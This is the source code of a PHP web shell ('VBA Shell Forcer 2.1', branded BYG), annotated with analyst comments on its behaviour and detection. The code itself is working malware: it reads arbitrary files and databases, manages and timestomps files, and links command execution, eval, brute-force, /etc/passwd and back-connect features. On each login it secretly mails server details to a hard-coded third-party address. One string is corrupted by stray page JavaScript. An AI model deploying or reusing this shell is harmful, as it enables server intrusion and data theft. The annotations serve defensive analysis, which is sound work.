1 <?php
2 /****************************************\
3 |* VBA SHELL FORCER - VERSION 2.1 *|
4 |* Edit & Develop by VBATEAM *|
5 |* http://vbateam.net *|
6 |* == Hacking & Security == *|
7 \****************************************/
// [analysis] Bootstrap of a PHP web shell; its menu further down links file-manager, MySQL,
// command-execution and eval actions. error_reporting(7) = E_ERROR | E_WARNING | E_PARSE, so notices
// about the undefined request variables used below are not reported.
8 error_reporting(7);
// set_magic_quotes_runtime() and eregi() were removed in PHP 7.0, get_magic_quotes_gpc() and the $s{0}
// string-offset syntax in PHP 8.0: as written, this listing only runs on PHP 5-era interpreters.
9 @set_magic_quotes_runtime(0);
10 ob_start();
// Start timestamp (seconds + microseconds); it is not read again in this part of the listing.
11 $mtime = explode(' ', microtime());
12 $starttime = $mtime[1] + $mtime[0];
// SA_ROOT: directory of this script, with forward slashes and a trailing '/'.
13 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
14 //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
// Platform probes: Windows path separator, availability of the COM class, magic_quotes_gpc state.
15 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
16 define('IS_COM', class_exists('COM') ? 1 : 0);
17 define('IS_GPC', get_magic_quotes_gpc());
// IS_PHPINFO is 1 unless "phpinfo" appears in php.ini's disable_functions value.
18 $dis_func = get_cfg_var('disable_functions');
19 define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
// Lifts the execution time limit for this request.
20 @set_time_limit(0);
// Request import (register_globals emulation): every GET and POST key that does not start with '_'
// becomes a global variable of the same name through $$_key. All later bare variables ($action, $doing,
// $password, $thefile, $dir, $dbhost, ...) are therefore request-controlled.
// s_array() is not in this part of the listing; presumably it strips magic-quotes slashes.
// Detection: the operation is selected by the parameters "action" and "doing", which gives request-body
// inspection (WAF or audit log) fixed field names to match.
21 foreach (array('_GET', '_POST') as $_request) {
22 foreach ($$_request as $_key => $_value) {
23 if ($_key{0} != '_') {
24 if (IS_GPC) {
25 $_value = s_array($_value);
26 }
27 $$_key = $_value;
28 }
29 }
30 }
31 /*================= Info Login ================*/
// [analysis] Access-gate configuration. $admin is assigned after the request-import loop above, so a
// request parameter named "admin" is overwritten here.
32 $admin = array();
// true turns the login gate on; it is tested by the "if ($admin['check'])" branch further down.
33 $admin['check'] = true;
// Static plaintext credential stored in the file itself: every copy of this build shares it, so a
// discovered copy should be treated as reachable by third parties, not only by whoever planted it.
34 $admin['pass'] = 'byg'; // Password login
// Cookie prefix, domain, path and lifetime (86400 s = 24 h); presumably consumed by scookie(), which is
// not in this part of the listing.
35 $admin['cookiepre'] = '';
36 $admin['cookiedomain'] = '';
37 $admin['cookiepath'] = '/';
38 $admin['cookielife'] = 86400;
39 /*===================== End =====================*/
// [analysis] $charset is request-supplied (see the import loop above) and only selects the Content-Type
// header. The 'latin1' choice sends iso-8859-2, not iso-8859-1.
40 if ($charset == 'utf8') {
41 header("content-Type: text/html; charset=utf-8");
42 } elseif ($charset == 'big5') {
43 header("content-Type: text/html; charset=big5");
44 } elseif ($charset == 'gbk') {
45 header("content-Type: text/html; charset=gbk");
46 } elseif ($charset == 'latin1') {
47 header("content-Type: text/html; charset=iso-8859-2");
48 }
// $self: this script's own URL path. It is concatenated unescaped into HTML further down
// (meta refresh targets and form actions).
49 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
// Request time; reused below as part of the field/line terminator marker in the MySQL download path.
50 $timestamp = time();
51 /*===================== Login =====================*/
// [analysis] Logout: expires the 'vbapass' cookie through scookie() (defined outside this part of the
// listing) and reloads the page.
52 if ($action == "logout") {
53 scookie('vbapass', '', -86400 * 365);
54 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
55 p('<body background=black>');
56 exit;
57 }
// Login: $doing and $password come from the request-import loop. On a match the password itself is
// stored as the 'vbapass' cookie value, so the credential travels in clear text in the Cookie header of
// every later request.
// Detection: a cookie named vbapass in proxy or web-server logs that record cookies.
58 if ($admin['check']) {
59 if ($doing == 'login') {
60 if ($admin['pass'] == $password) {
61 scookie('vbapass', $password);
// Phone-home: each successful login e-mails the hard-coded recipient below. Subject = this server's
// resolved IP and the Host header; body = the shell's full URL, the logging-in client's IP and the time;
// From / Reply-to = shell@ followed by the server IP. The distributor's own note on line 62 confirms it
// is a notification to the shell's author.
// Incident response: outbound mail from the web server with that From pattern is a detection hook, and
// the shell's location should be assumed known to that third party as well.
// Lines 66-67: the JavaScript after the address is e-mail-obfuscation decoder residue (cf-hash /
// data-cfemail) from the web page this listing was copied from; it sits inside the PHP string literal
// and is presumably not part of the original file.
62 // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
63 $time_shell = "" . date("d/m/Y - H:i:s") . "";
64 $ip_remote = $_SERVER["REMOTE_ADDR"];
65 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
66 $to_email = 'minhduong.pjn@gmail.com
67 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
68 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
69 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
70 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
// '@' hides any mail() warning, so a failed send leaves no trace in the page output.
71 @mail($to_email, $server_mail, $linkcr, $header);
// Success page: refreshes to $self after 2 s and loads an image from a third-party host, which produces
// an outbound request from the operator's browser.
72 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
73 p('<body bgcolor=black>
74 <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
75 exit;
76 } else {
// Failed login: the error banner is echoed and execution continues to the cookie gate below.
77 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
78 echo $err_mess;
79 }
80 }
// Gate for every other request: the cookie must equal the configured password, otherwise loginpage()
// is called (not in this part of the listing; presumably it prints the login form and stops).
81 if ($_COOKIE['vbapass']) {
82 if ($_COOKIE['vbapass'] != $admin['pass']) {
83 loginpage();
84 }
85 } else {
86 loginpage();
87 }
88 }
89 /*===================== Login =====================*/
// [analysis] action=phpinfo dumps the full PHP configuration page unless phpinfo is listed in
// disable_functions (IS_PHPINFO, computed at the top of the file). $errmsg is displayed later via m().
90 $errmsg = '';
91 if ($action == 'phpinfo') {
92 if (IS_PHPINFO) {
93 phpinfo();
94 } else {
95 $errmsg = 'phpinfo() function has non-permissible';
96 }
97 }
// [analysis] File download: $thefile is a request-supplied path used as-is. There is no base-directory
// or allow-list check, so any file readable by the PHP process user is returned as an attachment.
// Detection: a request carrying doing=downfile with a thefile path, answered with a Content-type of
// "application/x-" plus the file's extension.
// Mitigation on the host side is what limits the reach here: open_basedir and tight file permissions
// for the web-server account.
98 if ($doing == 'downfile' && $thefile) {
99 if (!@file_exists($thefile)) {
100 $errmsg = 'The file you want Downloadable was nonexistent';
101 } else {
// Header values are built from the path's extension and basename.
102 $fileinfo = pathinfo($thefile);
103 header('Content-type: application/x-' . $fileinfo['extension']);
104 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
105 header('Content-Length: ' . filesize($thefile));
106 @readfile($thefile);
107 exit;
108 }
109 }
// [analysis] MySQL dump sent to the browser. Host, user, password, database, charset and port all come
// from the request; dbconn(), q() and sqldumptable() are defined outside this part of the listing.
110 if ($doing == 'backupmysql' && !$saveasfile) {
111 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// $table is the request-supplied list of table names; flipping it makes the isset() lookup below a
// membership test.
112 $table = array_flip($table);
113 $result = q("SHOW tables");
114 if (!$result) p('<h2>' . mysql_error() . '</h2>');
// Attachment name: the client-supplied Host header plus "_MySQL.sql" (basename() drops any path part).
115 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
116 header('Content-type: application/unknown');
117 header('Content-Disposition: attachment; filename=' . $filename);
// NOTE(review): $mysqldata collects sqldumptable()'s return value but is never echoed in the visible
// lines; whether the dump reaches the client depends on sqldumptable() itself - confirm.
118 $mysqldata = '';
119 while ($currow = mysql_fetch_array($result)) {
120 if (isset($table[$currow[0]])) {
121 $mysqldata.= sqldumptable($currow[0]);
122 }
123 }
124 mysql_close();
125 exit;
126 }
127 // Mysql
// [analysis] File read through the database server instead of through PHP. Connection parameters and
// $mysqldlfile are request-supplied; dbconn() and q() are defined outside this part of the listing.
// Mitigation: this path depends on the database account holding the FILE privilege (load_file) or on
// LOCAL INFILE being permitted; web-application accounts should have neither, and the server-side
// secure_file_priv and local_infile settings restrict both.
128 if ($doing == 'mysqldown') {
129 if (!$dbname) {
130 $errmsg = 'Please input dbname';
131 } else {
132 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// The existence check runs in PHP on the web server's filesystem before any query is sent.
133 if (!file_exists($mysqldlfile)) {
134 $errmsg = 'The file you want Downloadable was nonexistent';
135 } else {
// First attempt: load_file(), with the path interpolated into the SQL string unescaped.
136 $result = q("select load_file('$mysqldlfile');");
137 if (!$result) {
// Fallback: a scratch table named tmp_angel is created, filled with LOAD DATA LOCAL INFILE (path passed
// through addslashes()), read back and dropped. The terminator marker is "__angel_" + request time +
// "_eof__".
// Detection: the table name tmp_angel and the __angel_..._eof__ marker are fixed strings to search for
// in MySQL general or audit logs.
138 q("DROP TABLE IF EXISTS tmp_angel;");
139 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
140 //Download SQL
141 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
142 $result = q("select content from tmp_angel");
143 q("DROP TABLE tmp_angel");
144 }
145 $row = @mysql_fetch_array($result);
146 if (!$row) {
147 $errmsg = 'Load file failed ' . mysql_error();
148 } else {
// The first column of the row is streamed to the client as an attachment named after the path's
// basename.
149 $fileinfo = pathinfo($mysqldlfile);
150 header('Content-type: application/x-' . $fileinfo['extension']);
151 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
152 header("Accept-Length: " . strlen($row[0]));
153 echo $row[0];
154 exit;
155 }
156 }
157 }
158 }
159 ?>
160 <html>
161 <head>
162 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
163 <title><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?></title>
164 <style type="text/css">
165 body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
166
167 a {color: #74A202;text-decoration:none;}
168 a:hover{color: #f00;text-decoration:underline;}
169 .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
170 .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
171 .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
172 .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
173 .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
174 .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
175 .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
176 .head td span{font-weight:normal;}
177 form{margin:0;padding:0;}
178 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
179 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
180 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
181 input, textarea, button
182 {
183 font-size: 9pt;
184 color: #ccc;
185 font-family: verdana, sans-serif;
186 background-color: #202020;
187 border-left: 1px solid #74A202;
188 border-top: 1px solid #74A202;
189 border-right: 1px solid #74A202;
190 border-bottom: 1px solid #74A202;
191 }
192 select
193 {
194 font-size: 8pt;
195 font-weight: normal;
196 color: #ccc;
197 font-family: verdana, sans-serif;
198 background-color: #202020;
199 }
200
201 </style>
202 <script type="text/javascript">
// [analysis] UI glue only. CheckAll copies the state of the "chkall" checkbox to every other element of
// the given form.
203 function CheckAll(form) {
204 for(var i=0;i<form.elements.length;i++) {
205 var e = form.elements[i];
206 if (e.name != 'chkall')
207 e.checked = form.chkall.checked;
208 }
209 }
// Shorthand for document.getElementById.
210 function $(id) {
211 return document.getElementById(id);
212 }
// Menu dispatcher: writes the chosen action name into the hidden "action" field of the form with id
// "goaction" and submits it. Every menu link on the page goes through this function, so navigation shows
// up as repeated form submissions to the same URL rather than as distinct paths.
213 function goaction(act){
214 $('goaction').action.value=act;
215 $('goaction').submit();
216 }
217 </script>
218 </head>
219 <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
220
221
222 <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
223 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
224 <tr>
225 <td align="center" valign=center>
226 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
227 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
228 </div>
229 </td>
230 </tr>
231 </table>
232 </div>
233 <script>
// [analysis] Legacy browser sniffing (document.all / document.layers) to find the "loading" overlay;
// init(), wired to body onLoad, hides it once the page has loaded.
// The surrounding markup loads the page background and the loading image from a third-party image host,
// so opening the page generates outbound requests from the viewer's browser to that host.
234 var ld=(document.all);
235 var ns4=document.layers;
236 var ns6=document.getElementById&&!document.all;
237 var ie4=document.all;
238 if (ns4)
239 ld=document.loading;
240 else if (ns6)
241 ld=document.getElementById("loading").style;
242 else if (ie4)
243 ld=document.all.loading.style;
244 function init()
245 {
246 if(ns4){ld.visibility="hidden";}
247 else if (ns6||ie4) ld.display="none";
248 }
249 </script>
250
251
252
253
254 <table width="100%" border="0" cellpadding="0" cellspacing="0">
255 <tr class="head_small">
256 <td width=100%>
257 <table width=100%><tr class="head_small"><td width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self; ?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
258 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
259
260 <?php
// [analysis] Environment banner printed at the top of every page: which database/cURL extensions exist,
// PHP version, the disable_functions list, uname output and the process uid/gid.
// Detection: the literal labels it prints ("Safe_mod:", "Disable functions :", "Uname -a") are stable
// strings to match in HTTP response bodies for this listing.
261 $curl_on = @function_exists('curl_version');
262 $mysql_on = @function_exists('mysql_connect');
263 $mssql_on = @function_exists('mssql_connect');
264 $pg_on = @function_exists('pg_connect');
265 $ora_on = @function_exists('ocilogon');
// $safe_mode is not assigned anywhere in the visible code; it is only set if a request parameter of
// that name is imported (or register_globals provides it), so the banner shows OFF otherwise.
266 echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
267 echo "PHP version: <b>" . @phpversion() . "</b> - ";
268 echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
// The function_exists() probes below repeat the assignments made at the top of this block.
269 echo "MySQL: <b>";
270 $mysql_on = @function_exists('mysql_connect');
271 if ($mysql_on) {
272 echo "<font color=green>ON</font></b> - ";
273 } else {
274 echo "<font color=red>OFF</font></b> - ";
275 }
276 echo "MSSQL: <b>";
277 $mssql_on = @function_exists('mssql_connect');
278 if ($mssql_on) {
279 echo "<font color=green>ON</font></b> - ";
280 } else {
281 echo "<font color=red>OFF</font></b> - ";
282 }
283 echo "PostgreSQL: <b>";
284 $pg_on = @function_exists('pg_connect');
285 if ($pg_on) {
286 echo "<font color=green>ON</font></b> - ";
287 } else {
288 echo "<font color=red>OFF</font></b> - ";
289 }
290 echo "Oracle: <b>";
291 $ora_on = @function_exists('ocilogon');
292 if ($ora_on) {
293 echo "<font color=green>ON</font></b>";
294 } else {
295 echo "<font color=red>OFF</font></b><BR>";
296 }
// Prints the hardening list itself, i.e. which PHP functions the host has disabled.
297 echo "Disable functions : <b>";
298 if ('' == ($df = @ini_get('disable_functions'))) {
299 echo "<font color=green>NONE</font></b><BR>";
300 } else {
301 echo "<font color=red>$df</font></b><BR>";
302 }
// uname string truncated to 120 characters.
303 echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
// $SERVER_SOFTWARE is likewise not assigned in the visible code. getmyuid() is printed under both the
// "id" and "uid" labels, and get_current_user() is used as the name for uid and gid alike.
304 echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
305 ?>
306 </td></tr></table></td>
307 </tr>
308 <tr class="alt1">
309 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span> <br />
310 --------------------------------------------------------------------------------------<br />
311
312 <a href="javascript:goaction('file');">File Manager</a> |
313 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
314 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
315 <a href="javascript:goaction('shell');">Execute Command</a> |
316 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
317 <a href="javascript:goaction('eval');">Eval PHP Code</a>
318 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
319 } ?>
320 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
321 } ?>
322 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
323 } ?>
324 </td>
325 </tr>
326 </table>
327 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
328 <?php
// [analysis] Emits the hidden form named "goaction" with an "action" field; the goaction() JavaScript
// in the page head fills that field and submits it. formhead(), makehide() and formfoot() are defined
// outside this part of the listing.
329 formhead(array('name' => 'goaction'));
330 makehide('action');
331 formfoot();
// Shows any error collected by the handlers above; m() is not in this part of the listing.
332 $errmsg && m($errmsg);
333 // Dir function
// $dir is request-supplied and defaults to '.'. getPath() and ue() are not in this part of the listing;
// $nowpath is what the file-manager branch below uses as the working directory.
334 !$dir && $dir = '.';
335 $nowpath = getPath(SA_ROOT, $dir);
336 if (substr($dir, -1) != '/') {
337 $dir = $dir . '/';
338 }
339 $uedir = ue($dir);
340 if (!$action || $action == 'file') {
341 // Non-writeable
342 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
343 // Delete dir
344 if ($doing == 'deldir' && $thefile) {
345 if (!file_exists($thefile)) {
346 m($thefile . ' directory does not exist');
347 } else {
348 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
349 }
350 }
351 // Create new dir
352 elseif ($newdirname) {
353 $mkdirs = $nowpath . $newdirname;
354 if (file_exists($mkdirs)) {
355 m('Directory has already existed');
356 } else {
357 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
358 @chmod($mkdirs, 0777);
359 }
360 }
361 // Upload file
362 elseif ($doupfile) {
363 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
364 }
365 // Edit file
366 elseif ($editfilename && $filecontent) {
367 $fp = @fopen($editfilename, 'w');
368 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
369 @fclose($fp);
370 }
371 // Modify
372 elseif ($pfile && $newperm) {
373 if (!file_exists($pfile)) {
374 m('The original file does not exist');
375 } else {
376 $newperm = base_convert($newperm, 8, 10);
377 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
378 }
379 }
380 // Rename
381 elseif ($oldname && $newfilename) {
382 $nname = $nowpath . $newfilename;
383 if (file_exists($nname) || !file_exists($oldname)) {
384 m($nname . ' has already existed or original file does not exist');
385 } else {
386 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
387 }
388 }
389 // Copu
390 elseif ($sname && $tofile) {
391 if (file_exists($tofile) || !file_exists($sname)) {
392 m('The goal file has already existed or original file does not exist');
393 } else {
394 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
395 }
396 }
397 // File exit
398 elseif ($curfile && $tarfile) {
399 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
400 m('The goal file has already existed or original file does not exist');
401 } else {
402 $time = @filemtime($tarfile);
403 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
404 }
405 }
406 // Date
407 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
408 if (!@file_exists($curfile)) {
409 m(basename($curfile) . ' does not exist');
410 } else {
411 $time = strtotime("$year-$month-$day $hour:$minute:$second");
412 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
413 }
414 }
415 // Download
416 elseif ($doing == 'downrar') {
417 if ($dl) {
418 $dfiles = '';
419 foreach ($dl as $filepath => $value) {
420 $dfiles.= $filepath . ',';
421 }
422 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
423 $dl = explode(',', $dfiles);
424 $zip = new PHPZip($dl);
425 $code = $zip->out;
426 header('Content-type: application/octet-stream');
427 header('Accept-Ranges: bytes');
428 header('Accept-Length: ' . strlen($code));
429 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
430 echo $code;
431 exit;
432 } else {
433 m('Please select file(s)');
434 }
435 }
436 // Delete file
437 elseif ($doing == 'delfiles') {
438 if ($dl) {
439 $dfiles = '';
440 $succ = $fail = 0;
441 foreach ($dl as $filepath => $value) {
442 if (@unlink($filepath)) {
443 $succ++;
444 } else {
445 $fail++;
446 }
447 }
448 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
449 } else {
450 m('Please select file(s)');
451 }
452 }
453 // Function Newdir
454 formhead(array('name' => 'createdir'));
455 makehide('newdirname');
456 makehide('dir', $nowpath);
457 formfoot();
458 formhead(array('name' => 'fileperm'));
459 makehide('newperm');
460 makehide('pfile');
461 makehide('dir', $nowpath);
462 formfoot();
463 formhead(array('name' => 'copyfile'));
464 makehide('sname');
465 makehide('tofile');
466 makehide('dir', $nowpath);
467 formfoot();
468 formhead(array('name' => 'rename'));
469 makehide('oldname');
470 makehide('newfilename');
471 makehide('dir', $nowpath);
472 formfoot();
473 formhead(array('name' => 'fileopform'));
474 makehide('action');
475 makehide('opfile');
476 makehide('dir');
477 formfoot();
478 $free = @disk_free_space($nowpath);
479 !$free && $free = 0;
480 $all = @disk_total_space($nowpath);
481 !$all && $all = 0;
482 $used = $all - $free;
483 $used_percent = @round(100 / ($all / $free), 2);
484 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
485 ?>
486 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
487 <form action="" method="post" id="godir" name="godir">
488 <tr>
489 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
490 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
491 <td nowrap><input class="bt" value="GO" type="submit"></td>
492 </tr>
493 </form>
494 </table>
495 <script type="text/javascript">
// [analysis] Client-side helpers for the file manager. Each one fills hidden fields of a named form and
// submits it; the field names they set (newdirname, newperm, pfile, sname, tofile, oldname, newfilename,
// doing, thefile, opfile, dir, view_writable) are the request parameters the PHP branches above read.
// Detection: the "godir" form in this listing is declared with method="post" and the "filelist" form
// with method="post" as well, so these parameters appear in request bodies, not in the URLs that
// default access logs record; request-body logging is needed to see them.
// createdir: prompts for a directory name and submits it as newdirname.
496 function createdir(){
497 var newdirname;
498 newdirname = prompt('Please input the directory name:', '');
499 if (!newdirname) return;
500 $('createdir').newdirname.value=newdirname;
501 $('createdir').submit();
502 }
// fileperm: prompts for a new mode and submits it with the target path (newperm, pfile).
503 function fileperm(pfile){
504 var newperm;
505 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
506 if (!newperm) return;
507 $('fileperm').newperm.value=newperm;
508 $('fileperm').pfile.value=pfile;
509 $('fileperm').submit();
510 }
// copyfile: prompts for a destination path and submits source and destination (sname, tofile).
511 function copyfile(sname){
512 var tofile;
513 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
514 if (!tofile) return;
515 $('copyfile').tofile.value=tofile;
516 $('copyfile').sname.value=sname;
517 $('copyfile').submit();
518 }
// rename: prompts for the new name and submits old and new names (oldname, newfilename).
519 function rename(oldname){
520 var newfilename;
521 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
522 if (!newfilename) return;
523 $('rename').newfilename.value=newfilename;
524 $('rename').oldname.value=oldname;
525 $('rename').submit();
526 }
// dofile: optional confirm dialog, then sets doing (and thefile when given) on the "filelist" form.
527 function dofile(doing,thefile,m){
528 if (m && !confirm(m)) {
529 return;
530 }
531 $('filelist').doing.value=doing;
532 if (thefile){
533 $('filelist').thefile.value=thefile;
534 }
535 $('filelist').submit();
536 }
// createfile: prompts for a file name and opens it through opfile() with action "editfile".
537 function createfile(nowpath){
538 var filename;
539 filename = prompt('Please input the file name:', '');
540 if (!filename) return;
541 opfile('editfile',nowpath + filename,nowpath);
542 }
// opfile: sets action, opfile and dir on the "fileopform" form and submits it.
543 function opfile(action,opfile,dir){
544 $('fileopform').action.value=action;
545 $('fileopform').opfile.value=opfile;
546 $('fileopform').dir.value=dir;
547 $('fileopform').submit();
548 }
// godir: changes the listed directory; a truthy second argument sets view_writable to 1.
549 function godir(dir,view_writable){
550 if (view_writable) {
551 $('godir').view_writable.value=1;
552 }
553 $('godir').dir.value=dir;
554 $('godir').submit();
555 }
556 </script>
557 <?php
558 tbhead();
559 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
560 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
561 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
562 if ($view_writable) {
563 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
564 } else {
565 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
566 }
567 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
568 if (IS_WIN && IS_COM) {
569 $obj = new COM('scripting.filesystemobject');
570 if ($obj && is_object($obj)) {
571 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
572 foreach ($obj->Drives as $drive) {
573 if ($drive->DriveType == 2) {
574 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
575 } else {
576 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
577 }
578 }
579 }
580 }
581 p('</td></tr></form>');
